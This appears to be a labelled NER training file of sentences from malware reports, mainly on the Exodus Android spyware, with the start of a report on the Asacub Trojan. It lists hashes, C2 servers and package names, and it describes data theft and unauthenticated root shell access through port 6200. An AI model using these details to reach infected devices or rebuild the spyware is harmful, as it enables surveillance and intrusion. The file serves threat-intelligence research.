{"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat .", "spans": {"SYSTEM: FireEye Mobile Threat Prevention": [[14, 46]], "MALWARE: RuMMS": [[127, 132]]}, "info": {"id": "cyner_train_001182", "source": "cyner_train"}}
{"text": "All of the victims are located in Italy .", "spans": {}, "info": {"id": "cyner_train_001190", "source": "cyner_train"}}
{"text": "All of these Google Play Store pages have been taken down by Google .", "spans": {"SYSTEM: Google Play Store": [[13, 30]], "ORGANIZATION: Google": [[61, 67]]}, "info": {"id": "cyner_train_001191", "source": "cyner_train"}}
{"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance .", "spans": {"ORGANIZATION: eSurv": [[75, 80]]}, "info": {"id": "cyner_train_001192", "source": "cyner_train"}}
{"text": "According to public records it appears that eSurv began to also develop intrusion software in 2016 .", "spans": {"ORGANIZATION: eSurv": [[44, 49]]}, "info": {"id": "cyner_train_001193", "source": "cyner_train"}}
{"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering .", "spans": {}, "info": {"id": "cyner_train_001195", "source": "cyner_train"}}
{"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years .", "spans": {"SYSTEM: Google Play Store": [[30, 47], [125, 142]]}, "info": {"id": "cyner_train_001196", "source": "cyner_train"}}
{"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise .", "spans": {}, "info": {"id": "cyner_train_001198", "source": "cyner_train"}}
{"text": "Often the app description on the Play Store would reference some SMS messages the targets would supposedly receive leading them to the Play Store page .", "spans": {"SYSTEM: Play Store": [[33, 43], [135, 145]]}, "info": {"id": "cyner_train_001200", "source": "cyner_train"}}
{"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves are written in Italian .", "spans": {"SYSTEM: Play Store": [[11, 21]]}, "info": {"id": "cyner_train_001201", "source": "cyner_train"}}
{"text": "According to Google , whom we have contacted to alert about our discoveries , nearly 25 variants of this spyware were uploaded on Google Play Store .", "spans": {"ORGANIZATION: Google": [[13, 19]], "SYSTEM: Google Play Store": [[130, 147]]}, "info": {"id": "cyner_train_001202", "source": "cyner_train"}}
{"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy .", "spans": {"SYSTEM: Play Store": [[167, 177]]}, "info": {"id": "cyner_train_001204", "source": "cyner_train"}}
{"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more .", "spans": {"MALWARE: Exodus": [[45, 51]]}, "info": {"id": "cyner_train_001205", "source": "cyner_train"}}
{"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper .", "spans": {"MALWARE: Exodus One": [[10, 20]], "SYSTEM: Google Play Store": [[93, 110]]}, "info": {"id": "cyner_train_001206", "source": "cyner_train"}}
{"text": "Following are some examples of the decoys used by these droppers : The purpose of Exodus One seems to be to collect some basic identifying information about the device ( namely the IMEI code and the phone number ) and send it to the Command & Control server .", "spans": {"MALWARE: Exodus One": [[82, 92]]}, "info": {"id": "cyner_train_001207", "source": "cyner_train"}}
{"text": "This is usually done in order to validate the target of a new infection .", "spans": {}, "info": {"id": "cyner_train_001208", "source": "cyner_train"}}
{"text": "This is further corroborated by some older and unobfuscated samples from 2016 , whose primary classes are named CheckValidTarget .", "spans": {}, "info": {"id": "cyner_train_001209", "source": "cyner_train"}}
{"text": "During our tests the spyware was upgraded to the second stage on our test device immediately after the first check-ins .", "spans": {}, "info": {"id": "cyner_train_001210", "source": "cyner_train"}}
{"text": "This suggests that the operators of the Command & Control are not enforcing a validation of the targets .", "spans": {}, "info": {"id": "cyner_train_001211", "source": "cyner_train"}}
{"text": "Additionally , during a period of several days , our infected test device was never remotely disinfected by the operators .", "spans": {}, "info": {"id": "cyner_train_001212", "source": "cyner_train"}}
{"text": "For the purpose of this report we analyze here the Exodus One sample with hash 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 which communicated with the Command & Control server at 54.71.249.137 .", "spans": {"MALWARE: Exodus One": [[51, 61]]}, "info": {"id": "cyner_train_001213", "source": "cyner_train"}}
{"text": "Other samples communicated with other servers listed at the bottom of this report .", "spans": {}, "info": {"id": "cyner_train_001214", "source": "cyner_train"}}
{"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information .", "spans": {}, "info": {"id": "cyner_train_001215", "source": "cyner_train"}}
{"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 .", "spans": {}, "info": {"id": "cyner_train_001216", "source": "cyner_train"}}
{"text": "Many of the strings in the application are XOR 'd with the key Kjk1MmphFG : After some additional requests , the dropper made a POST request to https : //54.71.249.137/56e087c9-fc56-49bb-bbd0-4fafc4acd6e1 which returned a zip file containing the second stage binaries .", "spans": {}, "info": {"id": "cyner_train_001217", "source": "cyner_train"}}
{"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries .", "spans": {}, "info": {"id": "cyner_train_001219", "source": "cyner_train"}}
{"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88", "spans": {}, "info": {"id": "cyner_train_001220", "source": "cyner_train"}}
{"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6", "spans": {}, "info": {"id": "cyner_train_001221", "source": "cyner_train"}}
{"text": "rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e", "spans": {}, "info": {"id": "cyner_train_001222", "source": "cyner_train"}}
{"text": "rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59", "spans": {}, "info": {"id": "cyner_train_001223", "source": "cyner_train"}}
{"text": "zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "spans": {}, "info": {"id": "cyner_train_001224", "source": "cyner_train"}}
{"text": "After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) .", "spans": {"MALWARE: Exodus One": [[17, 27]], "SYSTEM: Android API": [[110, 121]]}, "info": {"id": "cyner_train_001225", "source": "cyner_train"}}
{"text": "Similarly to another Android spyware made in Italy , originally discovered by Lukas Stefanko and later named Skygofree and analyzed in depth by Kaspersky Labs , Exodus also takes advantage of \" protectedapps '' , a feature in Huawei phones that allows to configure power-saving options for running applications .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Skygofree": [[109, 118]], "ORGANIZATION: Kaspersky Labs": [[144, 158]], "MALWARE: Exodus": [[161, 167]], "ORGANIZATION: Huawei": [[226, 232]]}, "info": {"id": "cyner_train_001229", "source": "cyner_train"}}
{"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml", "spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]]}, "info": {"id": "cyner_train_001231", "source": "cyner_train"}}
{"text": "these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications .", "spans": {}, "info": {"id": "cyner_train_001232", "source": "cyner_train"}}
{"text": "Record surroundings using the built-in microphone in 3gp format .", "spans": {}, "info": {"id": "cyner_train_001233", "source": "cyner_train"}}
{"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) .", "spans": {"SYSTEM: Chrome": [[49, 55]], "SYSTEM: SBrowser": [[60, 68]], "ORGANIZATION: Samsung": [[96, 103]]}, "info": {"id": "cyner_train_001234", "source": "cyner_train"}}
{"text": "Extract the calls log .", "spans": {}, "info": {"id": "cyner_train_001236", "source": "cyner_train"}}
{"text": "Extract the address book .", "spans": {"SYSTEM: address book": [[12, 24]]}, "info": {"id": "cyner_train_001240", "source": "cyner_train"}}
{"text": "Extract the contacts list from the Facebook app .", "spans": {"SYSTEM: Facebook app": [[35, 47]]}, "info": {"id": "cyner_train_001241", "source": "cyner_train"}}
{"text": "Take a screenshot of any app in foreground .", "spans": {}, "info": {"id": "cyner_train_001243", "source": "cyner_train"}}
{"text": "Extract information from th GMail app .", "spans": {"SYSTEM: GMail": [[28, 33]]}, "info": {"id": "cyner_train_001245", "source": "cyner_train"}}
{"text": "Dump data from the IMO messenger app .", "spans": {"SYSTEM: messenger": [[23, 32]]}, "info": {"id": "cyner_train_001246", "source": "cyner_train"}}
{"text": "Extract call logs , contacts and messages from the Skype app .", "spans": {"SYSTEM: Skype": [[51, 56]]}, "info": {"id": "cyner_train_001247", "source": "cyner_train"}}
{"text": "Extract messages and the encryption key from the Telegram app .", "spans": {"SYSTEM: Telegram": [[49, 57]]}, "info": {"id": "cyner_train_001249", "source": "cyner_train"}}
{"text": "Dump data from the Viber messenger app .", "spans": {"SYSTEM: Viber messenger": [[19, 34]]}, "info": {"id": "cyner_train_001250", "source": "cyner_train"}}
{"text": "Extract logs from WhatsApp .", "spans": {"SYSTEM: WhatsApp": [[18, 26]]}, "info": {"id": "cyner_train_001251", "source": "cyner_train"}}
{"text": "Retrieve media exchanged through WhatsApp .", "spans": {"SYSTEM: WhatsApp": [[33, 41]]}, "info": {"id": "cyner_train_001252", "source": "cyner_train"}}
{"text": "Extract the Wi-Fi network 's password .", "spans": {}, "info": {"id": "cyner_train_001253", "source": "cyner_train"}}
{"text": "Extract data from WeChat app .", "spans": {"SYSTEM: WeChat": [[18, 24]]}, "info": {"id": "cyner_train_001254", "source": "cyner_train"}}
{"text": "Extract current GPS coordinates of the phone .", "spans": {}, "info": {"id": "cyner_train_001255", "source": "cyner_train"}}
{"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges .", "spans": {}, "info": {"id": "cyner_train_001256", "source": "cyner_train"}}
{"text": "Ports 6203 and 6204 : Facebook extraction service .", "spans": {"ORGANIZATION: Facebook": [[22, 30]]}, "info": {"id": "cyner_train_001258", "source": "cyner_train"}}
{"text": "Port 6205 : Gmail extraction service .", "spans": {"SYSTEM: Gmail": [[12, 17]]}, "info": {"id": "cyner_train_001259", "source": "cyner_train"}}
{"text": "Port 6207 : Viber extraction service .", "spans": {"SYSTEM: Viber": [[12, 17]]}, "info": {"id": "cyner_train_001261", "source": "cyner_train"}}
{"text": "Port 6209 : Telegram extraction service .", "spans": {"SYSTEM: Telegram": [[12, 20]]}, "info": {"id": "cyner_train_001263", "source": "cyner_train"}}
{"text": "Port 6210 : SBrowser extraction service .", "spans": {"SYSTEM: SBrowser": [[12, 20]]}, "info": {"id": "cyner_train_001264", "source": "cyner_train"}}
{"text": "Port 6212 : Chrome extraction service .", "spans": {"SYSTEM: Chrome": [[12, 18]]}, "info": {"id": "cyner_train_001266", "source": "cyner_train"}}
{"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device .", "spans": {}, "info": {"id": "cyner_train_001267", "source": "cyner_train"}}
{"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app .", "spans": {"SYSTEM: Telegram": [[100, 108]]}, "info": {"id": "cyner_train_001268", "source": "cyner_train"}}
{"text": "We are able to send commands to the service such as dumpmsgdb or getkey ( which dumps the tgnet.dat file ) .", "spans": {}, "info": {"id": "cyner_train_001269", "source": "cyner_train"}}
{"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ .", "spans": {}, "info": {"id": "cyner_train_001271", "source": "cyner_train"}}
{"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data .", "spans": {}, "info": {"id": "cyner_train_001273", "source": "cyner_train"}}
{"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) .", "spans": {}, "info": {"id": "cyner_train_001274", "source": "cyner_train"}}
{"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ .", "spans": {}, "info": {"id": "cyner_train_001278", "source": "cyner_train"}}
{"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography .", "spans": {}, "info": {"id": "cyner_train_001280", "source": "cyner_train"}}
{"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases .", "spans": {"MALWARE: Exodus Two": [[27, 37]], "SYSTEM: Android": [[73, 80]]}, "info": {"id": "cyner_train_001282", "source": "cyner_train"}}
{"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port .", "spans": {}, "info": {"id": "cyner_train_001284", "source": "cyner_train"}}
{"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network .", "spans": {}, "info": {"id": "cyner_train_001285", "source": "cyner_train"}}
{"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well .", "spans": {}, "info": {"id": "cyner_train_001286", "source": "cyner_train"}}
{"text": "null is not the only payload opening a shell on the phone .", "spans": {}, "info": {"id": "cyner_train_001287", "source": "cyner_train"}}
{"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot", "spans": {}, "info": {"id": "cyner_train_001289", "source": "cyner_train"}}
{"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform .", "spans": {"SYSTEM: Google Play": [[66, 77]]}, "info": {"id": "cyner_train_001292", "source": "cyner_train"}}
{"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English .", "spans": {}, "info": {"id": "cyner_train_001294", "source": "cyner_train"}}
{"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro .", "spans": {}, "info": {"id": "cyner_train_001295", "source": "cyner_train"}}
{"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region .", "spans": {}, "info": {"id": "cyner_train_001297", "source": "cyner_train"}}
{"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ .", "spans": {"SYSTEM: Google Play Store": [[149, 166]]}, "info": {"id": "cyner_train_001298", "source": "cyner_train"}}
{"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A .", "spans": {}, "info": {"id": "cyner_train_001299", "source": "cyner_train"}}
{"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian", "spans": {}, "info": {"id": "cyner_train_001300", "source": "cyner_train"}}
{"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way .", "spans": {}, "info": {"id": "cyner_train_001302", "source": "cyner_train"}}
{"text": "The Command & Control server also displays a favicon image which looks like a small orange ball .", "spans": {}, "info": {"id": "cyner_train_001303", "source": "cyner_train"}}
{"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy .", "spans": {}, "info": {"id": "cyner_train_001305", "source": "cyner_train"}}
{"text": "eSurv 's logo is identical to the Command & Control server favicon .", "spans": {"ORGANIZATION: eSurv": [[0, 5]]}, "info": {"id": "cyner_train_001307", "source": "cyner_train"}}
{"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples", "spans": {"ORGANIZATION: eSurv": [[28, 33]], "ORGANIZATION: Google": [[44, 50]], "MALWARE: Exodus One": [[88, 98]]}, "info": {"id": "cyner_train_001308", "source": "cyner_train"}}
{"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ .", "spans": {}, "info": {"id": "cyner_train_001309", "source": "cyner_train"}}
{"text": "] it ( \" attiva '' is the Italian for \" activate '' ) .", "spans": {}, "info": {"id": "cyner_train_001310", "source": "cyner_train"}}
{"text": "( We named the spyware \" Exodus '' after this Command & Control domain name .", "spans": {}, "info": {"id": "cyner_train_001311", "source": "cyner_train"}}
{"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to", "spans": {"MALWARE: Exodus One": [[50, 60]], "MALWARE: Exodus spyware": [[333, 347]]}, "info": {"id": "cyner_train_001312", "source": "cyner_train"}}
{"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it .", "spans": {}, "info": {"id": "cyner_train_001313", "source": "cyner_train"}}
{"text": "Connexxa was a company also from Catanzaro .", "spans": {}, "info": {"id": "cyner_train_001314", "source": "cyner_train"}}
{"text": "According to publicly available information , the founder of Connexxa seems to also be the CEO of eSurv .", "spans": {"ORGANIZATION: Connexxa": [[61, 69]], "ORGANIZATION: eSurv": [[98, 103]]}, "info": {"id": "cyner_train_001315", "source": "cyner_train"}}
{"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001316", "source": "cyner_train"}}
{"text": "] it Bologna server1bs.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001317", "source": "cyner_train"}}
{"text": "] it Brescia server1cs.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001318", "source": "cyner_train"}}
{"text": "] it Cosenza server1ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001319", "source": "cyner_train"}}
{"text": "] it Catania server1fermo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001320", "source": "cyner_train"}}
{"text": "] it server1fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001321", "source": "cyner_train"}}
{"text": "] it Firenze server1gioiat.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001322", "source": "cyner_train"}}
{"text": "] it Napoli server1rc.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001324", "source": "cyner_train"}}
{"text": "] it Reggio Calabria server2ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001325", "source": "cyner_train"}}
{"text": "] it Catania server2cz.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001326", "source": "cyner_train"}}
{"text": "] it Catanzaro server2fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001327", "source": "cyner_train"}}
{"text": "] it Milano server2rc.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001329", "source": "cyner_train"}}
{"text": "] it Reggio Calabria server3bo.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001330", "source": "cyner_train"}}
{"text": "] it Catania server3.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001332", "source": "cyner_train"}}
{"text": "] it Firenze server4fi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001334", "source": "cyner_train"}}
{"text": "] it Firenze serverrt.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner_train_001335", "source": "cyner_train"}}
{"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f", "spans": {"MALWARE: Exodus": [[49, 55]], "MALWARE: Exodus One": [[113, 123], [164, 174]]}, "info": {"id": "cyner_train_001337", "source": "cyner_train"}}
{"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898", "spans": {}, "info": {"id": "cyner_train_001338", "source": "cyner_train"}}
{"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884", "spans": {}, "info": {"id": "cyner_train_001339", "source": "cyner_train"}}
{"text": "a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck", "spans": {"MALWARE: Exodus One": [[195, 205]]}, "info": {"id": "cyner_train_001340", "source": "cyner_train"}}
{"text": "rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two", "spans": {"MALWARE: Exodus Two": [[141, 151], [282, 292]]}, "info": {"id": "cyner_train_001341", "source": "cyner_train"}}
{"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33", "spans": {}, "info": {"id": "cyner_train_001342", "source": "cyner_train"}}
{"text": "3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a", "spans": {}, "info": {"id": "cyner_train_001343", "source": "cyner_train"}}
{"text": "b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f", "spans": {}, "info": {"id": "cyner_train_001344", "source": "cyner_train"}}
{"text": "Command & Controls ad1.fbsba [ .", "spans": {}, "info": {"id": "cyner_train_001345", "source": "cyner_train"}}
{"text": "] com ws.my-local-weather [ .", "spans": {}, "info": {"id": "cyner_train_001346", "source": "cyner_train"}}
{"text": "] 31 162.243.172 [ .", "spans": {}, "info": {"id": "cyner_train_001349", "source": "cyner_train"}}
{"text": "] 208 attiva.exodus.esurv [ .", "spans": {}, "info": {"id": "cyner_train_001350", "source": "cyner_train"}}
{"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds .", "spans": {"MALWARE: Asacub": [[31, 37]], "MALWARE: Trojan-Banker.AndroidOS.Asacub": [[69, 99]]}, "info": {"id": "cyner_train_001351", "source": "cyner_train"}}
{"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 ) , helping Asacub to claim top spots in last year ’ s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken .", "spans": {"MALWARE: Asacub": [[133, 139]], "MALWARE: Svpeng": [[273, 279]], "MALWARE: Faketoken": [[284, 293]]}, "info": {"id": "cyner_train_001352", "source": "cyner_train"}}
{"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia ’ s largest banks .", "spans": {"SYSTEM: Android": [[100, 107]]}, "info": {"id": "cyner_train_001354", "source": "cyner_train"}}
{"text": "The numbering seems to have started anew after the version 9 .", "spans": {}, "info": {"id": "cyner_train_001356", "source": "cyner_train"}}
{"text": "Versions 5.X.X-8.X.X were active in 2016 , and versions 9.X.X-1.X.X in 2017 .", "spans": {}, "info": {"id": "cyner_train_001358", "source": "cyner_train"}}
{"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 .", "spans": {}, "info": {"id": "cyner_train_001359", "source": "cyner_train"}}
{"text": "Communication with C & C Although Asacub ’ s capabilities gradually evolved , its network behavior and method of communication with the command-and-control ( C & C ) server changed little .", "spans": {"MALWARE: Asacub": [[34, 40]]}, "info": {"id": "cyner_train_001360", "source": "cyner_train"}}
{"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family .", "spans": {}, "info": {"id": "cyner_train_001361", "source": "cyner_train"}}
{"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php .", "spans": {}, "info": {"id": "cyner_train_001362", "source": "cyner_train"}}
{"text": "In earlier versions , the something part of the relative path was a partially intelligible , yet random mix of words and short combinations of letters and numbers separated by an underscore , for example , “ bee_bomb ” or “ my_te2_mms ” .", "spans": {}, "info": {"id": "cyner_train_001363", "source": "cyner_train"}}
{"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard .", "spans": {"MALWARE: Asacub": [[44, 50]]}, "info": {"id": "cyner_train_001364", "source": "cyner_train"}}
{"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan .", "spans": {}, "info": {"id": "cyner_train_001365", "source": "cyner_train"}}
{"text": "In early versions of Asacub , .com , .biz , .info , .in , .pw were used as top-level domains .", "spans": {"MALWARE: Asacub": [[21, 27]]}, "info": {"id": "cyner_train_001366", "source": "cyner_train"}}
{"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , “ muromec280j9tqeyjy5sm1qy71 ” or “ parabbelumf8jgybdd6w0qa0 ” .", "spans": {}, "info": {"id": "cyner_train_001367", "source": "cyner_train"}}
